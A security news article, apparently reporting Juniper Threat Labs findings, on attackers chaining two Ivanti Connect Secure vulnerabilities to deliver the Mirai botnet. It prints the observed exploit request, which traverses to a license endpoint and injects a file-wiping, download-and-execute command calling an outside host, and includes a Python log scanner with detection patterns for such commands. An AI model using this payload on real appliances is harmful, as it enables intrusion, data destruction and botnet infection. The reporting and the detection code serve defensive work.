Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities

Juniper Threat Labs has reported active exploitation attempts targeting vulnerabilities in Ivanti Pulse Secure VPN appliances.

These vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887, have been exploited to deliver the Mirai botnet, among other malware, posing a significant threat to network security worldwide.



CVE-2023-46805: Authentication Bypass

CVE-2023-46805 is a critical security flaw affecting Ivanti Connect Secure (ICS) and Ivanti Policy Secure gateways.

This vulnerability allows remote attackers to bypass authentication mechanisms and gain unauthorized access to restricted resources.

The flaw resides in the /api/v1/totp/user-backup-code endpoint, which lacks sufficient security checks. This enables attackers to exploit a path traversal flaw and access public-facing areas without proper authentication.

Affected versions include 9.x and 22.x of both Ivanti Connect Secure and Ivanti Policy Secure gateways.

CVE-2024-21887: Command Injection

The second vulnerability, CVE-2024-21887, is a command injection flaw found in the web components of Ivanti Connect Secure and Ivanti Policy Secure.

This vulnerability allows attackers to send specially crafted requests to execute arbitrary commands on the appliance.

This flaw is exploitable over the internet and involves a command injection in the /api/v1/license/keys-status/ API call.

By exploiting the CVE-2023-46805 vulnerability to gain access to this endpoint, attackers can inject malicious payloads, which can lead to the execution of shell commands and the delivery of malware, including the Mirai botnet.


Mirai Botnet Delivery

Juniper Threat Labs’ analysis has revealed instances where attackers have used these vulnerabilities to deliver Mirai payloads through shell scripts.

The following is the observed request (shown as an image in the original post); the encoded URL decodes to:
GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; wget http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1 

The observed attack involves a command sequence that attempts to wipe files, download a script from a remote server, set executable permissions, and execute the script, potentially leading to a system infection.
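The request above chains both CVEs: the path traversal out of the unauthenticated TOTP endpoint lands on the keys-status endpoint, and the remainder of the path is the injected shell command. As an added example (not part of the Juniper or GBHackers write-up), the following Python scans access-log lines for exactly that shape: it URL-decodes and normalizes each request path, reports requests that start at /api/v1/totp/user-backup-code/ but resolve elsewhere, and separately reports keys-status arguments containing shell syntax. The Common Log Format layout, client IPs, timestamps and the download host 198.51.100.200 in the sample lines are constructed for this example.

```python
import posixpath
import re
from urllib.parse import unquote

# Endpoints named in the article: the unauthenticated TOTP backup-code endpoint
# (CVE-2023-46805 entry point) and the keys-status endpoint that carries the
# command injection (CVE-2024-21887).
ENTRY_PREFIX = "/api/v1/totp/user-backup-code/"
INJECTION_PREFIX = "/api/v1/license/keys-status/"

# Shell separators and download/execute verbs that should never appear in the
# keys-status argument; legitimate callers pass a plain token there.
SHELL_META = re.compile(r"[;&|`]|\$\(|\b(wget|curl|chmod|rm)\b")

# Common Log Format request line (assumed layout for the constructed sample).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log. Line 1 is the published request with its spaces
# URL-encoded as a web server would log them; the download host is a
# documentation address, not the one observed by Juniper.
SAMPLE_LOG = """\
203.0.113.10 - - [20/Jan/2024:10:00:01 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/rm%20-rf%20*;%20cd%20/tmp;%20wget%20http://198.51.100.200/wtf.sh;%20chmod%20777%20wtf.sh;%20./wtf.sh HTTP/1.1" 403 0
203.0.113.11 - - [20/Jan/2024:10:00:02 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/1 HTTP/1.1" 200 12
198.51.100.5 - - [20/Jan/2024:10:00:03 +0000] "POST /healthcheck HTTP/1.1" 200 2
198.51.100.6 - - [20/Jan/2024:10:00:04 +0000] "GET /api/v1/license/keys-status/ HTTP/1.1" 401 0
"""


def analyze_target(target):
    """Return a list of findings for one request target (path plus query)."""
    path = target.split("?", 1)[0]
    decoded = unquote(unquote(path))          # tolerate double encoding
    normalized = posixpath.normpath(decoded)  # resolve the ../ segments
    findings = []

    # Traversal: the request enters through the unauthenticated endpoint but
    # the resolved path is a different API route.
    if decoded.startswith(ENTRY_PREFIX) and not normalized.startswith(
        ENTRY_PREFIX.rstrip("/")
    ):
        findings.append("CVE-2023-46805 traversal to %s" % normalized)

    # Injection: anything reaching keys-status with shell syntax in its argument.
    if normalized == INJECTION_PREFIX.rstrip("/") or normalized.startswith(
        INJECTION_PREFIX
    ):
        marker = "keys-status/"
        idx = decoded.find(marker)
        # Report the argument as sent, not the normalized form, so the
        # analyst sees the original URL in the download command.
        argument = (
            decoded[idx + len(marker):] if idx >= 0
            else normalized[len(INJECTION_PREFIX):]
        )
        if SHELL_META.search(argument):
            findings.append("CVE-2024-21887 command injection: %r" % argument)
    return findings


def scan_log(log_text):
    """Parse access-log lines and return one alert per suspicious request."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_target(m["target"])
        if findings:
            alerts.append(
                {"ip": m["ip"], "status": int(m["status"]), "findings": findings}
            )
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["status"])
        for finding in alert["findings"]:
            print("   ", finding)
```

Note that the second sample line is flagged for traversal alone even though its argument is harmless and the appliance answered 200: the authentication bypass is worth alerting on by itself, and an unexpected 200 on the traversal path is a sign the appliance is unpatched.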

The content of wtf.sh was also published by Juniper. Note that the file names use several offensive and derogatory terms and were shown in that research only.

The script tries to change into five system directories in turn: “/tmp”, “/var/run”, “/mnt”, “/root”, and “/”. Once it reaches a directory it can enter, it downloads a file called “lol” from a fixed URL (http://192[.]3[.]152[.]183/mips).

It then makes the downloaded file executable and runs it with the argument “0day_machine”. The “||” operator ensures that each subsequent cd attempt runs only if the previous one failed.

As a result, the download-and-execute commands run in the first directory in the list that can be reached.

Juniper analyzed the payloads, which have been identified as part of the Mirai botnet, indicating the severity of the threat posed by these vulnerabilities.

Exploiting Ivanti Pulse Secure’s vulnerabilities for Mirai botnet delivery underscores the evolving landscape of cyber threats.

Juniper Networks SRX Series Next-Generation Firewall (NGFW) customers with an IDP license are protected against these vulnerabilities using specific signatures for CVE-2023-46805 and CVE-2024-21887.

Organizations using Ivanti Pulse Secure appliances are urged to apply the provided patches immediately and review their security posture to protect against these and future vulnerabilities.

Indicators of Compromise

Hash Values of Mirai: 




The post Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

Author: Divya